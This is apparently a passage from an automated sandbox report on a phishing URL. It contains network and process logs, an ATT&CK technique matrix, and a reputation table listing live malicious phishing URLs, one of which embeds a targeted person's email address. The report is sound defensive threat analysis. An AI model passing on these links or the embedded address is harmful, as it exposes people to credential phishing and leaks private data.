        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62955
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62959
        Source: unknownNetwork traffic detected: HTTP traffic on port 62916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 62968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62950
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62951
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62968
        Source: unknownNetwork traffic detected: HTTP traffic on port 62963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62969
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 62980 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62960
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62961
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62957 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62975
        Source: unknownNetwork traffic detected: HTTP traffic on port 62985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62976
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62977
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62978
        Source: unknownNetwork traffic detected: HTTP traffic on port 62909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62970
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62971
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62972
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62974
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 62923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62987
        Source: unknownNetwork traffic detected: HTTP traffic on port 62940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62980
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62981
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62983
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62985
        Source: unknownNetwork traffic detected: HTTP traffic on port 62949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62917
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62918
        Source: unknownNetwork traffic detected: HTTP traffic on port 62955 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62919
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62911
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62912
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62914
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62915
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62916
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 61007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62921 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62928
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62929
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62920
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62921
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62922
        Source: unknownNetwork traffic detected: HTTP traffic on port 62984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62923
        Source: unknownNetwork traffic detected: HTTP traffic on port 62915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62924
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62925
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62926
        Source: unknownNetwork traffic detected: HTTP traffic on port 62932 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62927
        Source: unknownNetwork traffic detected: HTTP traffic on port 62967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62931
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62932
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62933
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62934
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62935
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62937
        Source: unknownNetwork traffic detected: HTTP traffic on port 62933 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62938
        Source: unknownNetwork traffic detected: HTTP traffic on port 62966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62930
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 62944 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62950 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62942
        Source: unknownNetwork traffic detected: HTTP traffic on port 62961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62943
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62944
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62945
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62946
        Source: unknownNetwork traffic detected: HTTP traffic on port 62938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62940
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62941
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62960 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62919 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62925 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62936 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62943 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62937 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61007
        Source: unknownNetwork traffic detected: HTTP traffic on port 62914 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62971 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62909
        Source: unknownNetwork traffic detected: HTTP traffic on port 62959 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62982 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62970 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62987 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62953 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62969 -> 443
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2
        Source: classification engineClassification label: mal80.phis.win@19/102@36/20
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT0%Avira URL Cloudsafe
        https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
        https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
        https://support.google.com/recaptcha#62627360%URL Reputationsafe
        https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
        https://support.google.com/recaptcha/#61759710%URL Reputationsafe
        https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.0%URL Reputationsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%URL Reputationsafe
        https://support.google.com/recaptcha0%URL Reputationsafe
        https://recaptcha.net0%URL Reputationsafe
        https://www.apache.org/licenses/0%URL Reputationsafe
        https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
        https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
        https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t70%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130100%Avira URL Cloudmalware
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb40%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180100%Avira URL Cloudmalware
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W0%Avira URL Cloudsafe
        https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF100%Avira URL Cloudmalware
        https://cloud.google.com/contact0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/2DUx/100%Avira URL Cloudmalware
        https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css0%Avira URL Cloudsafe
        https://a.nel.cloudflare.com/report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D0%Avira URL Cloudsafe
        https://cloud.google.com/contact0%VirustotalBrowse
        https://github.com/fent)0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106100%Avira URL Cloudmalware
        https://s3irk.ativens.com/RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv400%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/favicon.ico100%Avira URL Cloudmalware
        https://a.nel.cloudflare.com/report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D0%Avira URL Cloudsafe
        https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=6372927687687903910%Avira URL Cloudsafe
        https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2100%Avira URL Cloudmalware
        https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
        https://ipapi.co/8.46.123.33/json/0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/2DUx/#-100%Avira URL Cloudmalware
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b65740%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%Avira URL Cloudsafe
        https://www.google.com/recaptcha/api.js0%VirustotalBrowse
        https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69100%Avira URL Cloudmalware
        https://www.google.com/recaptcha/api2/0%VirustotalBrowse
        https://a.nel.cloudflare.com/report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210100%Avira URL Cloudmalware
        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%VirustotalBrowse
        https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72100%Avira URL Cloudmalware
        https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css0%Avira URL Cloudsafe
        https://cloud.google.com/recaptcha-enterprise/billing-information0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170100%Avira URL Cloudmalware
        https://httpbin.org/ip0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150100%Avira URL Cloudmalware
        https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js0%VirustotalBrowse
        https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47100%Avira URL Cloudmalware
        https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
        https://httpbin.org/ip1%VirustotalBrowse
        https://cdn.socket.io/4.6.0/socket.io.min.js0%Avira URL Cloudsafe
        https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com100%Avira URL Cloudmalware
        https://cloud.google.com/recaptcha-enterprise/billing-information0%VirustotalBrowse
        https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/xy12R7tzrssHzef25100%Avira URL Cloudmalware
        https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=6372927631215293800%Avira URL Cloudsafe
